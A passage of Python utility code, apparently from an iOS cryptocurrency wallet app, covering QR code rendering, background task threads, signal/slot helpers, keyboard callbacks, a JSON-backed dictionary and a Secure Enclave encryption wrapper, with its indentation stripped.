uiimage = get_qrcode_image_for_data(data)
qvc = UIViewController.new().autorelease()
qvc.title = title
iv = UIImageView.alloc().initWithImage_(uiimage).autorelease()
iv.autoresizeMask = UIViewAutoresizingFlexibleWidth|UIViewAutoresizingFlexibleHeight|UIViewAutoresizingFlexibleLeftMargin|UIViewAutoresizingFlexibleRightMargin|UIViewAutoresizingFlexibleTopMargin|UIViewAutoresizingFlexibleBottomMargin
iv.contentMode = UIViewContentModeScaleAspectFit
iv.opaque = True
iv.backgroundColor = UIColor.whiteColor
gr = UITapGestureRecognizer.new().autorelease()
iv.addGestureRecognizer_(gr)
def ActionBlock(gr : objc_id) -> None:
def ShowIt() -> None: show_share_actions(vc = qvc, img = iv.image, ipadAnchor = iv.frame, objectName = _("Image"))
c1 = UIColor.whiteColor
c2 = UIColor.colorWithRed_green_blue_alpha_(0.0,0.0,0.0,0.3)
iv.backgroundColorAnimationFromColor_toColor_duration_reverses_completion_(c1, c2, 0.2, True, ShowIt)
gr.addBlock_(ActionBlock)
iv.userInteractionEnabled = True
qvc.view = iv
nav = tintify(UINavigationController.alloc().initWithRootViewController_(qvc).autorelease())
vc.presentViewController_animated_completion_(nav,True,None)
return qvc
def get_qrcode_image_for_data(data : str, size : CGSize = None) -> ObjCInstance:
global _qr_cache
if not isinstance(data, (str, bytes)):
raise TypeError('argument to get_qrcode_for_data should be of type str or bytes!')
if isinstance(data, bytes): data = data.decode('utf-8')
uiimage = None
if not size: size = CGSizeMake(256.0,256.0)
key = "(%0.2f,%0.2f)[%s]"%(size.width,size.height,data)
uiimage = _qr_cache.get(key)
if uiimage is None:
#print("**** CACHE MISS for",key)
try:
qr = qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathFillImage)
qr.add_data(data)
img = qr.make_image()
except qrcode.exceptions.DataOverflowError:
NSLog("Failed to generate QR image -- data too long! Defaulting to OvalX.png. Data length was: %d bytes",len(data))
return UIImage.imageNamed_("OvalX")
fname = ""
tmp, fname = tempfile.mkstemp()
img.save(fname)
os.close(tmp)
with open(fname, 'r') as tmp_file:
contents = tmp_file.read()
os.remove(fname)
uiimage = UIImage.imageWithSVGString_targetSize_fillColor_cachedName_(
contents,
size,
UIColor.blackColor,
None
)
_qr_cache.put(key, uiimage)
#else:
# print("**** CACHE HIT for",key)
return uiimage
#########################################################################################
# Poor man's signal/slot support
# For our limited ObjC objects which can't have Python attributes
#########################################################################################
_cb_map = dict()
def add_callback(obj : ObjCInstance, name : str, callback : Callable) -> None:
global _cb_map
if name is None: raise ValueError("add_callback: name parameter must be not None")
if callable(callback):
m = _cb_map.get(obj.ptr.value, dict())
m[name] = callback
_cb_map[obj.ptr.value] = m
else:
remove_callback(obj, name)
def remove_all_callbacks(obj : ObjCInstance) -> None:
global _cb_map
_cb_map.pop(obj.ptr.value, None)
def remove_callback(obj : ObjCInstance, name : str) -> None:
global _cb_map
if name is not None:
m = _cb_map.get(obj.ptr.value, None)
if m is None: return
m.pop(name, None)
if len(m) <= 0:
_cb_map.pop(obj.ptr.value, None)
else:
_cb_map[obj.ptr.value] = m
else:
remove_all_callbacks(obj)
def get_callback(obj : ObjCInstance, name : str) -> Callable:
global _cb_map
def dummyCB(*args) -> None:
pass
if name is None: raise ValueError("get_callback: name parameter must be not None")
return _cb_map.get(obj.ptr.value, dict()).get(name, dummyCB)
#########################################################
# TaskThread Stuff
# -- execute a python task in a separate (Python) Thread
#########################################################
class TaskThread:
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the main thread.'''
Task = namedtuple("Task", "task cb_success cb_done cb_error")
def __init__(self, on_error=None):
self.on_error = on_error
self.tasks = queue.Queue()
self.worker = threading.Thread(target=self.run, name="TaskThread worker", daemon=True)
self.start()
def __del__(self):
#NSLog("TaskThread __del__")
if self.worker:
if self.worker.is_alive():
NSLog("TaskThread worker was running, force cancel...")
self.stop()
#self.wait()
self.worker = None
def start(self):
if self.worker and not self.worker.is_alive():
self.worker.start()
return True
elif not self.worker:
raise ValueError("The Thread worker was None!")
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get()
if not task:
break
try:
result = task.task()
do_in_main_thread(self.on_done, result, task.cb_done, task.cb_success)
except:
do_in_main_thread(self.on_done, sys.exc_info(), task.cb_done, task.cb_error)
NSLog("Exiting TaskThread worker thread...")
def on_done(self, result, cb_done, cb):
# This runs in the main thread.
if cb_done:
cb_done()
if cb:
cb(result)
def stop(self):
if self.worker and self.worker.is_alive():
self.tasks.put(None)
def wait(self):
if self.worker and self.worker.is_alive():
self.worker.join()
self.worker = None
@staticmethod
def test():
def onError(result):
NSLog("onError called, result=%s",str(result))
tt = TaskThread(onError)
def onDone():
nonlocal tt
NSLog("onDone called")
tt.stop()
tt.wait()
NSLog("test TaskThread joined ... returning.. hopefully cleanup will happen")
tt = None # cleanup?
def onSuccess(result):
NSLog("onSuccess called, result=%s",str(result))
def task():
NSLog("In task thread.. sleeping once every second for 10 seconds")
for i in range(0,10):
NSLog("Iter: %d",i)
time.sleep(0.2)
return "Yay!"
tt.add(task, onSuccess, onDone, onError)
class WaitingDialog:
'''Shows a please wait dialog whilst runnning a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, vc, message, task, on_success=None, on_error=None):
assert vc
self.vc = vc
self.thread = TaskThread()
def onPresented() -> None:
self.thread.add(task, on_success, self.dismisser, on_error)
#title = _("Please wait")
#self.alert=show_alert(vc = self.vc, title = title, message = message, actions=[], completion=onPresented)
self.alert = show_please_wait(vc = self.vc, message = message, completion=onPresented)
def __del__(self):
#print("WaitingDialog __del__")
pass
def wait(self):
self.thread.wait()
def on_finished(self) -> None:
self.thread.stop()
self.wait()
self.alert = None
self.thread = None
def dismisser(self) -> None:
def compl() -> None:
self.on_finished()
self.vc.dismissViewControllerAnimated_completion_(True, compl)
###
# NS -> py cache since our obj-c objects can't store python attributes :/
###
_nspy_dict = dict()
def nspy_get(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.get(ns.ptr.value,None)
def nspy_put(ns : ObjCInstance, py : Any) -> None:
global _nspy_dict
_nspy_dict[ns.ptr.value] = py
def nspy_pop(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.pop(ns.ptr.value,None)
def nspy_get_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if isinstance(m, dict):
ret = m.get(name,None)
return ret
def nspy_put_byname(ns : ObjCInstance, py : Any, name : str) -> None:
m = nspy_get(ns)
needPutBack = False
if m is None:
m = dict()
needPutBack = True
if isinstance(m, dict):
m[name] = py
if needPutBack: nspy_put(ns, m)
def nspy_pop_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if m and isinstance(m, dict):
ret = m.pop(name,None)
if not m: nspy_pop(ns) # clean up when dict is empty
return ret
####################################################################
# Another take on signals/slots -- Python-only signal/slot mechanism
####################################################################
class PySig(PrintError):
Entry = namedtuple('Entry', 'func key is_ns')
def __init__(self):
self.clear()
def clear(self) -> None:
try:
del self.entries
except AttributeError:
pass
self.entries = list() # list of slots
def connect(self, func : Callable, key : Any = None) -> None:
''' Note: the func arg, for now, needs to take explicit args and no *args, **kwags business as it's not yet supported.'''
if not callable(func):
raise ValueError("Passed-in arg to PySig connect is not a callable!")
is_ns = False
if isinstance(key, ObjCInstance):
is_ns = True
key = key.ptr.value
entry = PySig.Entry(func, key, is_ns)
self.entries.append(entry)
def disconnect(self, func_or_key : Any = None) -> None:
if func_or_key is None:
self.clear()
return
func = None
key = None
removeAll = False
if callable(func_or_key):
func = func_or_key
else:
key = func_or_key
if isinstance(key, ObjCInstance):
key = key.ptr.value
removeAll = True
removeCt = 0
keep = list()
for i,entry in enumerate(self.entries):
if (removeCt == 0 or removeAll) and ((key is not None and key == entry.key) or (func is not None and func == entry.func)):
removeCt += 1
else:
keep.append(entry)
self.entries = keep
#NSLog("Remove %d connections", removeCt)
if removeCt: return
name = "<Unknown NSObject>"
try:
name = str(func_or_key)
except:
print(str(sys.exc_info()[1]))
finally:
NSLog("PySig disconnect: *** WARNING -- could not find '%s' in list of connections!",name)
def emit_common(self, require_sync : bool, *args) -> None:
def doIt(entry, wasMainThread, *args) -> None:
try:
if not wasMainThread and (not self.entries or entry not in self.entries):
# entry was removed from underneath us before callback ran!
pass
else:
sig = signature(entry.func)
# call slot...
entry.func(*args[:len(sig.parameters)])
finally:
#if not wasMainThread and entry.is_ns:
# release iff NSObject..
# ObjCInstance(objc_id(entry.key)).release()
# NSLog(" *** NSObject release")
pass
isMainThread = bool(NSThread.currentThread.isMainThread)
# guard against slots requesting themselves to be removed while this loop is iterating
entries = self.entries.copy()
#if not isMainThread: # first, run through all entries that may be NSObjects and retain them
#for entry in entries:
# if it's an NSObject, retain it then release it in the embedded callback
#if entry.is_ns:
# NSLog(" *** NSObject retain")
# ObjCInstance(objc_id(entry.key)).retain()
# next, call the slots in the main thread, optionally releasing any nsobject retained above
for entry in entries:
if isMainThread:
doIt(entry, isMainThread, *args)
elif require_sync:
do_in_main_thread_sync(doIt, entry, isMainThread, *args)
else:
do_in_main_thread(doIt, entry, isMainThread, *args)
def emit(self, *args) -> None:
self.emit_common(False, *args)
def emit_sync(self, *args) -> None:
self.emit_common(True, *args)
class MyNSObs(NSObject):
@objc_method
def dealloc(self) -> None:
#print("MyNSObs dealloc")
sig = nspy_pop(self)
if sig is not None:
#print("MyNSObs -- sig was found...")
sig.emit(sig.ptr)
sig.observer = None
else:
print("MyNSObs -- sig was None!")
send_super(__class__,self,'dealloc')
class NSDeallocObserver(PySig):
''' Provides the ability to observe the destruction of an objective-c object instance, and be notified of said
object's destruction on the main thread via our Qt-like 'signal' mechanism. For an example of this class's usefulness,
see the 'register_keyboard_callbacks' function later in this file.
Note that it is not necessary to keep a reference to this object around as it automatically gets associated with
internal data structures and auto-removes itself once the signal is emitted. The signal itself has 1 param, the objc_id
of the watched object. The watched object may or may not still be alive when the signal is emitted, however.'''
def __init__(self, ns : ObjCInstance, observer_class : MyNSObs = None):
if not isinstance(ns, (ObjCInstance, objc_id)):
raise ValueError("Argument for NSDeallocObserver must be an ObjCInstance or objc_id")
super().__init__()
self.ptr = ns.ptr if isinstance(ns, ObjCInstance) else ns
import rubicon.objc.runtime as rt
if observer_class is None: observer_class = MyNSObs
self.observer = observer_class.new().autorelease()
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, self.observer.ptr, 0x301)
nspy_put(self.observer, self) # our NSObject keeps a strong reference to us
def dissociate(self) -> None:
self.disconnect()
import rubicon.objc.runtime as rt
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, objc_id(0), 0x301)
'''
# This is here for debugging purposes.. Commented out as __del__ is dangerous if it has external dependencies
def __del__(self):
#print ("NSDeallocObserver __del__")
if self.observer:
print("NSDeallocObserver __del__: self.observer was not nil!")
nspy_pop(self.observer)
#super().__del__()
'''
def set_namedtuple_field(nt : object, fieldname : str, newval : Any) -> object:
try:
d = nt._asdict()
except:
raise ValueError('set_namedtuple_field, first argument does not appear to be a valid namedtuple!')
if not isinstance(fieldname, str):
raise ValueError('set_namedtuple_field, fieldname (second arg) must be a string!')
if fieldname not in d:
raise ValueError('%s is not a field in namedtuple %s'%(str(fieldname),type(nt).__qualname__))
else:
d[fieldname] = newval
return type(nt)(**d)
#########################################################################################################
# Data Manager -- domain based data cache -- uses this app's PySig mechanism to announce interested #
# subsystems about data updates. Used by tx history (and other app mechanisms). Instances live in #
# the gui.ElectrumGui instance. .emit() implicitly empties the cache. emptyCache() implicitly emits. #
#########################################################################################################
class DataMgr(PySig):
def __init__(self):
super().__init__()
#self.clear() # super calls clear, which calls this instance method, which itself calls super().clear().. python inheritence is weird
def clear(self):
super().clear()
self.datas = dict()
def keyify(self, key: Any) -> Any:
if isinstance(key, (list,tuple,dict,set)):
key = str(key)
return key
def get(self, realkey : Any) -> Any:
key = self.keyify(realkey)
if key not in self.datas:
#print("DataMgr: cache miss for domain (%s), calling doReload"%(str(key)))
self.datas[key] = self.doReloadForKey(realkey)
else:
pass
#print("DataMgr: cache HIT for domain (%s)"%(str(key)))
return self.datas.get(key, None)
def emptyCache(self, noEmit : bool = False, require_sync : bool = False, *args) -> None:
self.datas = dict()
if not noEmit:
super().emit_common(require_sync = require_sync, *args)
def emit_common(self, require_sync : bool, *args) -> None:
self.emptyCache(noEmit = False, require_sync = require_sync, *args)
def doReloadForKey(self, key : Any) -> Any:
NSLog("DataMgr: UNIMPLEMENTED -- doReloadForKey() needs to be overridden in a child class!")
return None
######
### Various helpers for laying out text, building attributed strings, etc...
######
_f1 = UIFont.systemFontOfSize_weight_(16.0,UIFontWeightBold).retain()
_f2 = UIFont.systemFontOfSize_weight_(11.0,UIFontWeightBold).retain()
_f2_ipad = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightSemibold).retain()
_f3 = UIFont.systemFontOfSize_weight_(1.0,UIFontWeightThin).retain()
_f4 = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightLight).retain()
_s3 = ns_from_py(' ').sizeWithAttributes_({NSFontAttributeName:_f3})
_kern = -0.5 # kerning for some of the text labels in some of the views (in points). Despite having given this an underscore name, other files in this package refer to this symbol. ;)
def stripAmount(s : str) -> str:
return s.translate({ord(i):None for i in '+- '}) #strip +/-
def makeFancyDateAttrString(datestr : str, font : ObjCInstance = None) -> ObjCInstance:
''' Make the ending MM:SS of the date field be 'light' text as per Max's UI spec '''
if font is None: font = _f4
if datestr: datestr = datestr.translate({ord('-') : '.'}) # replace hyphens in date with '.' chars as per Max's recommendations
ats = NSMutableAttributedString.alloc().initWithString_(datestr).autorelease()
l = len(datestr)
ix = datestr.rfind(' ', 0, l)
if ix >= 0:
r = NSRange(ix,l-ix)
ats.addAttribute_value_range_(NSFontAttributeName,font,r)
return ats
def hackyFiatAmtAttrStr(amtStr : str, fiatStr : str, ccy : str, pad : float, color : ObjCInstance = None, cb : Callable = None, kern : float = None, amtColor = None, isIpad = False) -> ObjCInstance:
#print("str=",amtStr,"pad=",pad,"spacesize=",_s3.width)
p = ''
if fiatStr:
if pad > 0.0:
n = round(pad / _s3.width)
p = ''.join([' ' for i in range(0, n)])
fiatStr = p + ' ' + fiatStr + ' ' + ccy
else:
fiatStr = ''
ats = NSMutableAttributedString.alloc().initWithString_(amtStr + fiatStr).autorelease()
rAmt = NSRange(0,len(amtStr))
ats.addAttribute_value_range_(NSFontAttributeName,_f1,rAmt)
if amtColor: ats.addAttribute_value_range_(NSForegroundColorAttributeName,amtColor,rAmt)
if fiatStr:
if callable(cb): cb()
r0 = NSRange(len(amtStr),len(p))
ats.addAttribute_value_range_(NSFontAttributeName,_f3,r0)
r = NSRange(len(amtStr)+len(p),len(fiatStr)-len(p))
r2 = NSRange(ats.length()-(len(ccy)+1),len(ccy))
ats.addAttribute_value_range_(NSFontAttributeName,_f2 if not isIpad else _f2_ipad,r)
if kern: ats.addAttribute_value_range_(NSKernAttributeName,kern,r)
#ats.addAttribute_value_range_(NSBaselineOffsetAttributeName,3.0,r)
if color:
ats.addAttribute_value_range_(NSForegroundColorAttributeName,color,r)
#ats.addAttribute_value_range_(NSFontAttributeName,_f3,r2)
#ats.addAttribute_value_range_(NSObliquenessAttributeName,0.1,r)
#ps = NSMutableParagraphStyle.new().autorelease()
#ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
#ps.alignment = NSJustifiedTextAlignment
#ps.lineBreakMode = NSLineBreakByWordWrapping
#ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
return ats
###############################################################################
# Facility to register python callbacks for when the keyboard is shown/hidden #
###############################################################################
_kbcb_idx = 0
_kbcb_dict = dict()
_kbcb_Entry = namedtuple('_kbcb_Entry', 'handle view obs handler onWillHide onWillShow onDidHide onDidShow')
class UTILSKBCBHandler(NSObject):
handle = objc_property()
@objc_method
def dealloc(self) -> None:
self.handle = None
send_super(__class__, self, 'dealloc')
@objc_method
def willHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onWillHide: entry.onWillHide()
@objc_method
def didHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onDidHide: entry.onDidHide()
@objc_method
def willShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onWillShow: entry.onWillShow(rect)
@objc_method
def didShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onDidShow: entry.onDidShow(rect)
# it's safe to never unregister, as an objc associated object will be created for the view in question and will clean everything up on
# view dealloc. The '*Hide' callbacks should take 0 arguments, the '*Show' callbacks take 1, a CGRect of the keyboard in the destination view's coordinates
def register_keyboard_callbacks(view : ObjCInstance, onWillHide = None, onWillShow = None, onDidHide = None, onDidShow = None) -> int:
if not any([onWillHide, onWillShow, onDidShow, onDidShow]) or not view or not isinstance(view, UIView):
NSLog("WARNING: register_keyboard_callbacks: need at least one callback specified, as well as non-null view! Will return early!")
return 0
global _kbcb_idx
_kbcb_idx += 1
handle = _kbcb_idx
obs = NSDeallocObserver(view)
handler = UTILSKBCBHandler.new()
handler.handle = handle
entry = _kbcb_Entry(handle, view, obs, handler, onWillHide, onWillShow, onDidHide, onDidShow)
if entry.onWillHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willHide:'),UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willShow:'),UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didHide:'),UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didShow:'),UIKeyboardDidShowNotification,None)
_kbcb_dict[handle] = entry
obs.connect(lambda x: unregister_keyboard_callbacks(handle))
return handle
# unless you call this, the keyboard callback will stay alive until the target view is dealloc'd. At which time all resources
# WILL be cleaned-up. This function is provided in case you want to stop observing the keyboard hide/show events early.
def unregister_keyboard_callbacks(handle : int) -> None:
entry = None
if isinstance(handle, int): entry = _kbcb_dict.pop(handle, None)
if entry:
if entry.onWillHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidShowNotification,None)
entry.obs.disconnect()
entry.obs.dissociate()
entry.handler.release()
else:
NSLog("*** WARNING: unregister_keyboard_callbacks could not find handle %d!", handle)
# boilerplate code below to auto-scroll textfields/textviews when keyboard shown. Install this in viewWillAppear.
def register_keyboard_autoscroll(sv : UIScrollView) -> int:
if not isinstance(sv, UIScrollView):
NSLog("*** WARNING: register_keyboard_autoscroll called but it wasn't passed a UIScrollView. Ignoring!")
return None
def kbShow(r : CGRect) -> None:
resp = UIResponder.currentFirstResponder()
window = sv.window()
if resp and isinstance(resp, UIView) and window and resp.window():
#r = sv.convertRect_toView_(r, window)
visible = sv.convertRect_toView_(sv.bounds, window)
visible.size.height -= r.size.height
respFrame = resp.convertRect_toView_(resp.bounds, window)
origin = respFrame.origin
bottomLeft = CGPoint(origin.x, origin.y+respFrame.size.height)
diff = None
if not CGRectContainsPoint(visible, bottomLeft) and (is_portrait() or is_ipad()):
diff = (bottomLeft.y - (visible.origin.y+visible.size.height)) + 25.0
elif not CGRectContainsPoint(visible, origin):
diff = origin.y - visible.origin.y - 25.0
if diff:
'''
def fmt(x):
if isinstance(x, CGRect):
return "%f,%f,%f,%f"%(x.origin.x,x.origin.y,x.size.width,x.size.height)
elif isinstance(x, CGPoint):
return "%f,%f"%(x.x,x.y)
else:
return str(x)
print("window",fmt(window.bounds),"origin",fmt(origin),"bottomLeft",fmt(bottomLeft),"respFrame",fmt(respFrame),"visible",fmt(visible),"contentOffset",fmt(sv.contentOffset))
'''
scrollPoint = CGPoint(0.0, sv.contentOffset.y + diff)#origin.y - visible.size.height + respFrame.size.height + 10)
sv.setContentOffset_animated_(scrollPoint, True)
#def kbHide() -> None:
# #sv.setContentOffset_animated_(CGPoint(0,0), True)
# pass
return register_keyboard_callbacks(sv, onWillShow = kbShow)#, onDidHide = kbHide)
# be sure to unregister the autoscroller when view disappears. Install unregister call in viewWillDisappear.
def unregister_keyboard_autoscroll(handle : int) -> None:
unregister_keyboard_callbacks(handle)
##### File Backed Dict
class FileBackedDict(object):
def __init__(self, fileName : str, other : object = None):
self._d = dict()
self._fn = fileName
if isinstance(other, FileBackedDict):
self._d = other._d.copy()
if self.write():
NSLog("File-backed dict '%s' created as copy of '%s'",os.path.split(self._fn)[-1],os.path.split(other._fn)[-1])
else:
if os.path.exists(self._fn): self.read()
else: NSLog("New empty file-backed dict '%s' -- will create file once data is added.",os.path.split(self._fn)[-1])
def read(self) -> bool:
if not os.path.exists(self._fn):
NSLog("*** WARNING: JSON dict file does not (yet?) exist: %s", self._fn)
return False
try:
with open(self._fn, "r") as f:
result = json.load(f)
except:
NSLog("*** WARNING: Cannot read JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
if not isinstance(result, dict):
NSLog("*** WARNING: JSON file read but is not a dict: %s", self._fn)
return False
self._d = result
return True
def write(self) -> bool:
try:
with open(self._fn, "w") as f:
json.dump(self._d, f, indent=4)
os.chmod(self._fn, stat.S_IREAD | stat.S_IWRITE)
except:
NSLog("*** WARNING: Cannot write JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
return True
def dict(self) -> dict:
return self._d
def get(self, key : Any, default : Any = None) -> Any:
return self._d.get(key, default)
def set(self, key : Any, value : Any, save : bool = True) -> None:
self._d[key] = value
if save: self.write()
def has(self, key : Any) -> bool:
return bool(key in self._d)
def pop(self, key : Any, save : bool = True) -> Any:
if not isinstance(save, bool):
NSLog("*** WARNING: FileBackedDict's pop() method doesn't take a default value. The second argument is always the 'save' arg!")
ret = self._d.pop(key, None)
if save: self.write()
return ret
def clearAll(self, save : bool = True) -> None:
self._d = dict()
if save: self.write()
##### Wrapper for iOS Secure key enclave -- instantiates a KeyInterface class on the Objective C side. Note this requires TouchID/FaceID
class SecureKeyEnclave:
instances = 0
def __init__(self, keyDomain : str):
self._keyInterface = KeyInterface.keyInterfaceWithPublicKeyName_privateKeyName_(keyDomain + ".pubkey", keyDomain + ".privkey").retain()
SecureKeyEnclave.instances += 1
self.lastErrorCode = 0
#NSLog("SecureKeyEnclave: instance created (%d total extant instances)",SecureKeyEnclave.instances)
def __del__(self):
try:
if self._keyInterface:
self._keyInterface.release()
self._keyInterface = None
SecureKeyEnclave.instances -= 1
NSLog("SecureKeyEnclave: instance deleted (%d total instances left)",SecureKeyEnclave.instances)
except:
pass
def biometrics_available(self) -> bool:
return self._keyInterface.biometricsAreAvailable
def biometrics_are_not_available_reason(self) -> str: # returns failure reason if unavailable, or '' if available
err = objc_id(0)
self.lastErrorCode = 0
if not self._keyInterface.biometricsAreAvailableWithError_(byref(err)):
if err and err.value:
err = ObjCInstance(err)
self.lastErrorCode = err.code
return str(err.description)
else:
return 'Unknown Reason'
return ''
def has_keys(self) -> bool:
return bool(self._keyInterface.publicKeyExists)
def delete_keys(self) -> bool:
return self._keyInterface.deleteKeyPair()
# Asynchronously generate the private/public keypair. Note that touchID doesn't seem to come up when this is called
# but it may. Completion is called on success or error. If error, first arge is false and second arg may be an iOS error string.
def generate_keys(self, completion : Callable[[bool,str],None] = None) -> None:
self.lastErrorCode = 0
if self._keyInterface.publicKeyExists:
if callable(completion):
completion(True,'')
return
def Compl(b : bool, e : objc_id) -> None:
errStr = ''
if e and e.value:
e = ObjCInstance(e)
self.lastErrorCode = e.code
errStr = str(e.description)
if callable(completion): completion(bool(b), errStr)
self._keyInterface.generateTouchIDKeyPairWithCompletion_(Compl)
def encrypt_data(self, data : bytes) -> bytes:
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('SecureKeyEnclave.encrypt_data requires a bytes argument!')
plainText = NSData.dataWithBytes_length_(data,len(data))
self.lastErrorCode = 0
err = objc_id(0)
cypherText = self._keyInterface.encryptData_error_(plainText, byref(err))
if not cypherText:
e = ''
if err and err.value:
err = ObjCInstance(err)
e = str(err.description)
self.lastErrorCode = err.code
NSLog("SecureKeyEnclave encrypt data failed with (Code=%d) error: %s", self.lastErrorCode, e)
return None
return bytes((c_ubyte * cypherText.length).from_address(cypherText.bytes))
# input: any plaintext string. output: a hex representation of the encrypted cyphertext data eg 'ff80be3376ff..'
def encrypt_str2hex(self, plainText : str) -> str:
b = self.encrypt_data(plainText)
if b is not None:
import binascii
return binascii.hexlify(b).decode('utf-8')
return None
# the inverse of the above. input: a hex string, eg 'ff80be3376...', callback is called with (plainText:str, error:str) as args
def decrypt_hex2str(self, hexdata : str, completion : Callable[[str,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
import binascii
cypherBytes = binascii.unhexlify(hexdata)
def MyCompl(pt : bytes, error : str) -> None:
plainText = pt.decode('utf-8', errors='ignore') if pt is not None else None
completion(plainText, error)
self.decrypt_data(cypherBytes, MyCompl, prompt = prompt)
# May pop up a touchid window, which user may cancel. If touchid not available, or user cancels, the completion is called
# with None,errstr as args (errStr comes from iOS and is pretty arcane).
# Otherwise completion is called with the plainText bytes as first argument on success.
def decrypt_data(self, data : bytes, completion : Callable[[bytes,str],None], prompt : str = None) -> None:
self.lastErrorCode = 0
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
if not prompt: prompt = _("Authenticate, please")
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('A bytes or str object is required as the first argument to this function!')
cypherText = NSData.dataWithBytes_length_(data, len(data))
def Compl(dptr : objc_id, eptr : objc_id) -> None:
plainText = ObjCInstance(dptr) if dptr and dptr.value else None
error = None
if eptr and eptr.value:
e = ObjCInstance(eptr)
error = e.description
self.lastErrorCode = e.code
if plainText:
plainText = bytes((c_ubyte * plainText.length).from_address(plainText.bytes))
completion(plainText, error)
self._keyInterface.prompt = prompt
self._keyInterface.decryptData_completion_(cypherText, Compl)
'''
@classmethod
def DoTests(cls, bundleId : str, doDelete : bool = False) -> None:
keyEnclave = cls(bundleId)
print("BioMetricsAvail:",keyEnclave.biometrics_available())
print("BioMetricsNotAvailReason:",keyEnclave.biometrics_are_not_available_reason())
if doDelete:
keyEnclave.delete_keys()
print("Deleted All Keys")
pt = b'The quick brown fox jumped over the lazy dogs!!\0\0'
ptstr = pt.decode('utf-8')
def DataDecrypted(pts : str, error : str) -> None:
if pts is None:
print("Got decryption error", error)
else:
print("decrypted data was [",pts.encode('utf-8'),"]","compare =", pts==ptstr)
def DoEnc() -> None:
c = keyEnclave.encrypt_str2hex(ptstr)
if c is not None:
print("cypherText=",c)
keyEnclave.decrypt_hex2str(c,DataDecrypted)
else:
print("CypherText was NONE...!")
def KeysGenerated(b : bool, e : str) -> None:
print("Keys generated:",b,e)
if b: DoEnc()
if not keyEnclave.has_keys():
keyEnclave.generate_keys(KeysGenerated)
else:
DoEnc()
def Cleaner() -> None:
# keep a ref around for 10s then delete object.
nonlocal keyEnclave
keyEnclave = None
call_later(10.0, Cleaner)
'''
##### Boilerplate crap
class boilerplate:
# iOS weirdness. Buttons don't always flash to highlighted state on tap.. so we have to force it using this hack.
@staticmethod
def vc_highlight_button_then_do(vc : UIViewController, but : UIButton, func : Callable[[],None]) -> None:
if not but or not vc:
# Defensive programming...
func()
return
#if not isinstance(vc, UIViewController) or not isinstance(but, UIButton) or not callable(func):
# raise ValueError('One of the arguments passed to vc_highlight_button_then_do is invalid!')
but.retain()
call_later(0.030, lambda: but.setHighlighted_(True))
call_later(0.3, lambda: but.autorelease().setHighlighted_(False))
vc.retain()
call_later(0.1, lambda: vc.autorelease().viewIfLoaded and func())
# Layout constraint stuff.. programatically
@staticmethod
def layout_peg_view_to_superview(view : UIView) -> None:
if not view.superview():
NSLog("Warning: layout_peg_view_to_superview -- passed-in view lacks a superview!")
return
sv = view.superview()
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterX, NSLayoutRelationEqual, view, NSLayoutAttributeCenterX, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterY, NSLayoutRelationEqual, view, NSLayoutAttributeCenterY, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeHeight, NSLayoutRelationEqual, view, NSLayoutAttributeHeight, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
